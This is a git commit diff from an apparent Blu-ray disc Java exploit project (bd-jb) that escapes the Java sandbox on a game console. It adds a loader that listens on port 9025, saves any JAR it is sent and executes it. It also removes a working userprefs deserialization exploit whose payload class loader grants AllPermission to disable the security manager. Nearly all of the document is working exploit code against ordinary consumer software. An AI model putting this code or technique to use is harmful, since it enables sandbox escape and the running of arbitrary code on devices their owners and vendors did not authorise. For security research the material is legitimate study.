Add remote JAR loader and remove userprefs exploit.

2024-12-12 10:12:15 -05:00 · 2024-11-28 19:02:08 +01:00 · 2024-11-28 19:02:08 +01:00 · 44713ef59f
commit 44713ef59f
parent cca6e2810b
10 changed files with 121 additions and 206 deletions
--- a/39
+++ b/39
@ -5,8 +5,12 @@ LIB = lib
 SRC = src
 TOOLS = tools
-CLASSES = \
+LOADER_CLASSES = \
-	$(SRC)/com/bdjb/ExploitXlet.java \
+	$(SRC)/com/bdjb/LoaderXlet.java \
 	$(SRC)/com/bdjb/Loader.java \
 	$(SRC)/com/bdjb/Screen.java \
 EXPLOIT_CLASSES = \
 	$(SRC)/com/bdjb/Exploit.java \
 	$(SRC)/com/bdjb/Screen.java \
 	$(SRC)/com/bdjb/api/API.java \
@ -25,39 +29,42 @@ CLASSES = \
 	$(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
 	$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
 	$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
 	$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
 JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
-all: directory serialized classes jar bdjo_bdmv
+all: loader exploit
-directory:
+loader: build_directory loader_classes loader_jar loader_bdjo_bdmv
 exploit: build_directory exploit_classes exploit_jar
 build_directory:
 	mkdir -p $(BUILD)
-serialized:
+loader_classes:
-	javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
+	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(LOADER_CLASSES)
 	java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
 	rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
-classes:
+exploit_classes:
-	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
+	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(EXPLOIT_CLASSES)
-jar:
+loader_jar:
 	rm -rf $(BUILD)/jdk
 	mkdir -p  $(DISC)/BDMV/JAR
-	cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
+	cp $(SRC)/com/bdjb/bluray.LoaderXlet.perm $(BUILD)/com/bdjb/bluray.LoaderXlet.perm
 	cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
 	java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
-bdjo_bdmv:
+exploit_jar:
 	rm -rf $(BUILD)/jdk
 	cd $(BUILD) && jar cf 00000.jar . && cd ..
 loader_bdjo_bdmv:
 	mkdir -p  $(DISC)/BDMV/BDJO
 	java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
 	java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
--- a/bdmv/bdjo.xml
+++ b/bdmv/bdjo.xml
@ -15,7 +15,7 @@
        <classpathExtension></classpathExtension>
        <iconFlags>0x0</iconFlags>
        <iconLocator></iconLocator>
-        <initialClassName>com.bdjb.ExploitXlet</initialClassName>
+        <initialClassName>com.bdjb.LoaderXlet</initialClassName>
        <priority>128</priority>
        <profiles>
          <majorVersion>1</majorVersion>
--- a/src/com/bdjb/Exploit.java
+++ b/src/com/bdjb/Exploit.java
@ -9,26 +9,16 @@ package com.bdjb;
 import com.bdjb.exploit.kernel.ExploitKernelInterface;
 import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
 import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
 import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
 import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
-import java.io.FileOutputStream;
+import java.lang.reflect.Method;
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.net.InetAddress;
 import java.net.ServerSocket;
 import java.net.Socket;
 class Exploit implements Runnable {
  static void init() {
    Screen.println("[+] bd-jb by theflow");
 public class Exploit {
  public static void main(Method screenPrintln) {
    Screen.setRemotePrintln(screenPrintln);
    Screen.println("[*] Escaping Java Sandbox...");
-    Class[] sandboxExploits =
+    Class[] sandboxExploits = new Class[] {ExploitDefaultImpl.class, ExploitServiceProxyImpl.class};
        new Class[] {
          ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class
        };
    for (int i = 0; i < sandboxExploits.length; i++) {
      try {
@ -46,29 +36,4 @@ class Exploit implements Runnable {
      Screen.println("[-] Error could not disable security manager.");
    }
  }
  static void start() {
    new Thread(new Exploit()).start();
  }
  public void run() {
    if (System.getSecurityManager() != null) {
      return;
    }
    Screen.println("[*] Exploiting kernel...");
    Class[] kernelExploits = new Class[] {};
    for (int i = 0; i < kernelExploits.length; i++) {
      try {
        ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance();
        if (exploit.trigger()) {
          break;
        }
      } catch (Exception e) {
        continue;
      }
    }
  }
 }
--- a/src/com/bdjb/Loader.java
+++ b/src/com/bdjb/Loader.java
@ -0,0 +1,73 @@
 /*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */
 package com.bdjb;
 import java.io.FileOutputStream;
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.net.ServerSocket;
 import java.net.Socket;
 import java.net.URL;
 import java.lang.reflect.Method;
 import org.dvb.lang.DVBClassLoader;
 class Loader implements Runnable {
  private static final String MNT_ADA_JAR_FILE = "/OS/HDD/download0/mnt_ada/00000.jar";
  private static final String EXPLOIT_CLASS_NAME = "com.bdjb.Exploit";
  private static final String MAIN_METHOD_NAME = "main";
  private static final String PRINTLN_METHOD_NAME = "println";
  static void startJarLoader() {
    new Thread(new Loader()).start();
  }
  public void run() {
    Screen.println("[+] bd-jb by theflow");
    while (true) {
      Screen.println("[*] Listening for remote JAR on port 9025...");
      try {
        ServerSocket serverSocket = new ServerSocket(9025);
        Socket socket = serverSocket.accept();
        InputStream inputStream = socket.getInputStream();
        OutputStream outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);
        byte[] buf = new byte[8192];
        int total = 0;
        int read;
        while ((read = inputStream.read(buf)) > 0) {
          outputStream.write(buf, 0, read);
          total += read;
        }
        outputStream.close();
        inputStream.close();
        serverSocket.close();
        Screen.println("[+] Received " + total + " bytes");
        Screen.println("[+] Launching JAR...");
        DVBClassLoader dvbClassLoader =
            DVBClassLoader.newInstance(new URL[] {new URL("file://" + MNT_ADA_JAR_FILE)});
        Class exploitClass = dvbClassLoader.loadClass(EXPLOIT_CLASS_NAME);
        Method main = exploitClass.getMethod(MAIN_METHOD_NAME, new Class[] {Method.class});
        Method screenPrintln =
            Screen.class.getMethod(PRINTLN_METHOD_NAME, new Class[] {String.class});
        main.invoke(null, new Object[] {screenPrintln});
        Screen.println("[+] JAR exited");
      } catch (Exception e) {
        Screen.println("[-] Error: " + e.getMessage());
      }
    }
  }
 }
--- a/src/com/bdjb/ExploitXlet.java
+++ b/src/com/bdjb/ExploitXlet.java
@ -13,13 +13,11 @@ import javax.tv.xlet.XletContext;
 import org.havi.ui.HScene;
 import org.havi.ui.HSceneFactory;
-public class ExploitXlet implements Xlet {
+public class LoaderXlet implements Xlet {
  private HScene scene;
  private Screen screen;
  public void initXlet(XletContext context) {
    Exploit.init();
    screen = Screen.getInstance();
    screen.setSize(1920, 1080); // BD screen size
@ -31,7 +29,7 @@ public class ExploitXlet implements Xlet {
  public void startXlet() {
    screen.setVisible(true);
    scene.setVisible(true);
-    Exploit.start();
+    Loader.startJarLoader();
  }
  public void pauseXlet() {
--- a/src/com/bdjb/Screen.java
+++ b/src/com/bdjb/Screen.java
@ -11,6 +11,7 @@ import java.awt.Color;
 import java.awt.Container;
 import java.awt.Font;
 import java.awt.Graphics;
 import java.lang.reflect.Method;
 import java.util.ArrayList;
 public class Screen extends Container {
@ -22,13 +23,27 @@ public class Screen extends Container {
  private static final Screen instance = new Screen();
  private static Method remoteScreenPrintln = null;
  public static Screen getInstance() {
    return instance;
  }
  public static void setRemotePrintln(Method screenPrintln) {
    remoteScreenPrintln = screenPrintln;
  }
  public static void println(String msg) {
-    messages.add(msg);
+    if (remoteScreenPrintln != null) {
-    instance.repaint();
+      try {
        remoteScreenPrintln.invoke(null, new Object[] {msg});
      } catch (Exception e) {
        // Ignore.
      }
    } else {
      messages.add(msg);
      instance.repaint();
    }
  }
  public void paint(Graphics g) {
--- a/src/com/bdjb/bluray.ExploitXlet.perm
+++ b/src/com/bdjb/bluray.ExploitXlet.perm
--- a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
+++ b/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
@ -1,61 +0,0 @@
 /*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */
 package com.bdjb.exploit.sandbox;
 import java.io.FileOutputStream;
 import java.io.InputStream;
 import java.io.ObjectOutputStream;
 import java.io.OutputStream;
 import org.havi.ui.HSceneFactory;
 /** Implementation of the userprefs deserialization exploit. */
 public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
  private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
  private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
      "/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
  public boolean trigger() throws Exception {
    try {
      // Overwrite userprefs with a serialized PayloadClassLoader.
      InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
      OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
      byte[] buf = new byte[8192];
      int read;
      while ((read = inputStream.read(buf)) > 0) {
        outputStream.write(buf, 0, read);
      }
      outputStream.close();
      inputStream.close();
      // Trigger deserialization vulnerability.
      try {
        HSceneFactory.getInstance().getDefaultHScene();
      } catch (ClassCastException e) {
        // Exception expected.
        // Instantiate the payload class.
        PayloadClassLoader.getInstance().newPayload();
        return System.getSecurityManager() == null;
      }
    } finally {
      // Restore userprefs file.
      String[][] preferences = new String[9][];
      preferences[3] = new String[] {"26"};
      ObjectOutputStream outputStream =
          new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
      outputStream.writeObject(preferences);
      outputStream.close();
    }
    return false;
  }
 }
--- a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
+++ b/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
@ -1,57 +0,0 @@
 /*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */
 package com.bdjb.exploit.sandbox;
 import java.io.ByteArrayOutputStream;
 import java.io.InputStream;
 import java.io.ObjectInputStream;
 import java.io.Serializable;
 import java.security.AllPermission;
 import java.security.Permissions;
 import java.security.ProtectionDomain;
 /** ClassLoader subclass that is instantiated on deserialization. */
 class PayloadClassLoader extends ClassLoader implements Serializable {
  private static final long serialVersionUID = 0x4141414141414141L;
  private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
  private static PayloadClassLoader instance;
  static PayloadClassLoader getInstance() {
    return instance;
  }
  private void readObject(ObjectInputStream stream) {
    instance = this;
  }
  void newPayload() throws Exception {
    InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_FILE);
    ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
    byte[] buf = new byte[8192];
    int read;
    while ((read = inputStream.read(buf)) > 0) {
      outputStream.write(buf, 0, read);
    }
    inputStream.close();
    byte[] payload = outputStream.toByteArray();
    // Instantiate the payload class with all permissions to disable the security manager.
    Permissions permissions = new Permissions();
    permissions.add(new AllPermission());
    ProtectionDomain protectionDomain = new ProtectionDomain(null, permissions);
    Class payloadClass =
        defineClass(PAYLOAD_CLASS_NAME, payload, 0, payload.length, protectionDomain);
    payloadClass.newInstance();
  }
 }
--- a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
+++ b/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
@ -1,25 +0,0 @@
 /*
 * Copyright (C) 2021 Andy Nguyen
 *
 * This software may be modified and distributed under the terms
 * of the MIT license.  See the LICENSE file for details.
 */
 package com.bdjb.exploit.sandbox;
 import com.bdjb.exploit.sandbox.PayloadClassLoader;
 import java.io.FileOutputStream;
 import java.io.ObjectOutputStream;
 /** Simple util to create a serialized object of the PayloadClassLoader class. */
 class PayloadClassLoaderSerializer {
  public static void main(String[] args) {
    try {
      ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
      objectOutputStream.writeObject(new PayloadClassLoader());
      objectOutputStream.close();
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
 }